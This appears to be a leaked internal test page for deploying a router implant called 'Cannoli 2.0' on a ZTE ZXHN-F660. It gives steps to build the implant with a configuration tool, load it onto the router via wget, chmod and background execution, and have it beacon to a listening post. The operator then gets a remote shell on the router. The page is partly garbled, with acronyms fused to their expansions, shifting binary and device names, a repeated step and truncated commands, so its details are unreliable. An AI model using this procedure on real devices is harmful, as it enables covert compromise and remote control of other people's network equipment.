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Owner: User #1179928
Setup / Test ZTE ZXHN-F660 with ARM5 LE configured Cannoli 2.0 (2/24 - )
- Connect ZTE ZXHN LANLocal Area Network side to VLANVirtual Local Area Network 611 for Cannoli LANLocal Area Network side (DHCPDynamic Host Configuration Protocol from DUTDevice Under Test / GW = .1)
- Cannoli-lan-1 VMVirtual Machine should obtain a IP address from the F660
On Cannoli LP/LAN side machine (same VMVirtual Machine):
- Unzipped Cannoli 2.0 zip in: /home/ndb/calibar/cannoli_v2.0.0/
- In /bin/ folder, copied the .cfg example file and make a calibar.cfg file with the LPListening Post IP as the #1 LPListening Post (
- Run the following command to create client & server files:
- ./CCT ../bin/arm5-32-LE-static/client/client calibar-client ../bin/arm5-32-LE-static/server/server calibar-server calibar.cfg
- Place the configured Cannoli client binary and the script into a directory served via HTTPHypertext Transfer Protocol from the LAN-side machine.
- Using a web browser, log in to the web administration page on the router. (This initiates a session, which is required for the following steps to work.)
On LANLocal Area Network VM
- With the LANLocal Area Network side computer setup with HTTPHypertext Transfer Protocol access and the calibar-client file on the WWW root folder (/var/www), run the following command to upload the calibar-client file to the ZXHN-F660
- wget
- Once prize-client has uploaded, change the permissions
- #chmod 755 prize-client
- With LPListening Post listening (directions below) start the prize-client on the AC68U
- /tmp# ./prize-client -b &
- With the LANLocal Area Network side computer setup with HTTPHypertext Transfer Protocol access and the calibar-client file on the WWW root folder (/var/www), run the following command to upload the calibar-client file to the ZXHN-F660
From Cannoli LPListening Post window:
- With the "./calibar-server 9000" already running on the LP... implant beacons back with it's source IP of
- Beacon was originally set to beacon every 60 seconds
- Modify example script to set taget_mac to WANWide Area Network mac address (Impant ID) of ASUS
- Issued "./" command after this to get a shell once the target beacons back again.
- type "ls" at new shell prompt and the file system on target is seen
- native shell commands are available
- More test notes located on